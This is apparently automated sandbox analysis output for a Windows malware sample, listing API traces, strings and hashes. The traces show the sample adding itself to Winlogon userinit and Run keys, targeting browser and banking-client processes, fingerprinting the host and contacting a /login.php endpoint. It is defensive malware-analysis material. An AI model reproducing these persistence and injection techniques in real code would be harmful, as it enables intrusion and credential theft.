                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 2650560580-3024904723
                                                                                                                                                                                                            • Opcode ID: f65b58ec25810f257154d9f40708fff7cf862138ba577591463d415b3b901667
                                                                                                                                                                                                            • Instruction ID: 28172f90e5e0e640766d7087b7683017d09902a65e3f7253698369a4a91b92d5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f65b58ec25810f257154d9f40708fff7cf862138ba577591463d415b3b901667
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED617075640305BBEB64DF64CC88FEA7BB8EF84744F548459FA059B280E7B4EA41CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                            • DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02BC4FE7
                                                                                                                                                                                                            • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02BC5045
                                                                                                                                                                                                            • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                            • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                            • API String ID: 1656757314-3977723178
                                                                                                                                                                                                            • Opcode ID: c3c80d3cf26a5e342067f1323bf404e87d75f50e9bf4ab15635f7090e8849dac
                                                                                                                                                                                                            • Instruction ID: d59620ce9ac73ee1955c6b66e805a94096b6de4643486066d5af0fae7501bad0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3c80d3cf26a5e342067f1323bf404e87d75f50e9bf4ab15635f7090e8849dac
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3621A476A8431867EB70D6A4AC41FDAB76CDB54750F4045D5F788E7080DAF0AAD48BE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02BB7FF1
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BB8002
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02BB8010
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BB8019
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BB802F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB8041
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BB8069
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02BB8082
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 02BB808D
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 02BB8099
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 02BB80A4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
                                                                                                                                                                                                            • String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$\explorer.exe
                                                                                                                                                                                                            • API String ID: 2248524772-792691438
                                                                                                                                                                                                            • Opcode ID: f53ae14284c4754efe3b20052a0e5a2e2f2cd9e1a8e46bee7dbb2bd5f79cc01d
                                                                                                                                                                                                            • Instruction ID: bdadd71732932befece7347989e09c4e95afc028ad2e3b1966c15d383ebf5caa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f53ae14284c4754efe3b20052a0e5a2e2f2cd9e1a8e46bee7dbb2bd5f79cc01d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B21C6319807046AD272A769DC49BBAB7ACEF80B91F810B55FB9497180DBF4D8148BA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BC78B4
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 02BC78D9
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02BC78FD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02BC7917
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC793B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02BC7941
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02BC7948
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC7977
                                                                                                                                                                                                              • Part of subcall function 02BD4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                              • Part of subcall function 02BD4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                              • Part of subcall function 02BD4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                              • Part of subcall function 02BD4880: FindCloseChangeNotification.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                              • Part of subcall function 02BD4880: CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 02BC798B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC79A5
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 02BC79B6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02BC7912
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleInformationProcess$Close$ChangeCriticalFindHeapNotificationOpenProcess32SectionToken$AllocateCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                            • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02BB79FC
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02BB7A0F
                                                                                                                                                                                                              • Part of subcall function 02BD4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                              • Part of subcall function 02BD4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                              • Part of subcall function 02BD4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                              • Part of subcall function 02BD4880: FindCloseChangeNotification.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                              • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                              • Part of subcall function 02BD4880: CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BB7A1E
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BB7A37
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02BB7A3E
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,69889606a), ref: 02BB7A54
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7A99
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB7AB3
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02BB7AC6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Information$HandleOpenProcess$CloseCurrentThreadToken$ChangeCharDesktopFindMutexNotificationObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                            • String ID: 69889606a$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Token$CurrentOpenProcessThread$AdjustChangeCloseErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                                                                                                            • String ID: SeSecurityPrivilege
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 02A01451
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 02A01515
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594045872.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02BC7DFE
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02BC7E27
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BC7E47
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02BC7E64
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC7E6B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC7E7F
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BC7E99
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02BC7EA1
                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02BC7F40
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7F4F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC7F52
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7F5F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC7F62
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02BC7F6C
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02BC7F8D
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02BC7FBD
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02BC7FC7
                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 02BC7FD1
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC7FD7
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02BC800D
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC801C
                                                                                                                                                                                                            • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02BC8039
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BC8044
                                                                                                                                                                                                            • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02BC8067
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                            • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB66B0
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: memset.MSVCRT ref: 02BC4AED
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02BC4B27
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4B2E
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: memset.MSVCRT ref: 02BC4B3E
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: memcpy.MSVCRT ref: 02BC4B5D
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02BC4BC2
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB670F
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB671F
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB6729
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB6734
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB674F
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB675C
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB6766
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB6771
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB6794
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB67A1
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB67AB
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB67B6
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB67D9
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB67E6
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02BB67F0
                                                                                                                                                                                                            • exit.MSVCRT ref: 02BB67FF
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02BC4BE1
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02BC4C19
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02BC4C4A
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02BC4C5E
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: _snprintf.MSVCRT ref: 02BC4C7C
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02BC4C94
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02BC4CAA
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02BC4CCD
                                                                                                                                                                                                              • Part of subcall function 02BC4AB0: CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02BC4D05
                                                                                                                                                                                                            • _strrev.MSVCRT ref: 02BB6869
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001,?), ref: 02BB692C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB692F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB693C
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 02BB693F
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?,00000000,00000001,00000000,/login.php,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02BB694A
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,?,?), ref: 02BB695B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,?), ref: 02BB6962
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • /login.php, xrefs: 02BB66C1, 02BB66D8
                                                                                                                                                                                                            • 10001, xrefs: 02BB682A
                                                                                                                                                                                                            • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02BB680D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • API ID: callocexit$HeapHttp$Request$File$HeadersProcessmemset$InternetOpen$AllocAttributesConnectCreateDeleteExistsFreeInfoPathQuerySendValidate_snprintf_strrevmemcpy
                                                                                                                                                                                                            • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB3106
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: memset.MSVCRT ref: 02BD5023
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5032
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02BD5039
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: memset.MSVCRT ref: 02BD5051
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD5068
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD506E
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD508F
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50B6
                                                                                                                                                                                                              • Part of subcall function 02BD4FF0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50CA
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: memset.MSVCRT ref: 02BD5124
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5133
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BD513A
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: memset.MSVCRT ref: 02BD5152
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5169
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD516F
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5190
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51B7
                                                                                                                                                                                                              • Part of subcall function 02BD50F0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51CB
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,76F92F70,00000000), ref: 02BB3144
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,?,?,76F92F70,00000000), ref: 02BB3151
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,76F92F70,00000000), ref: 02BB3168
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,76F92F70,00000000), ref: 02BB318E
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,76F92F70,00000000), ref: 02BB31AF
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,76F92F70,00000000), ref: 02BB31B9
                                                                                                                                                                                                            • CharUpperA.USER32(00000000,?,?,76F92F70,00000000), ref: 02BB31DF
                                                                                                                                                                                                            • CharUpperA.USER32(00000000,?,?,?,76F92F70,00000000), ref: 02BB31E8
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB3201
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB325F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,76F92F70,00000000), ref: 02BB328E
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 02BB3297
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,02BC6E07,?,?,76F92F70,00000000), ref: 02BB32A3
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 02BB32A6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,76F92F70,00000000), ref: 02BB32B6
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,76F92F70,00000000), ref: 02BB32B9
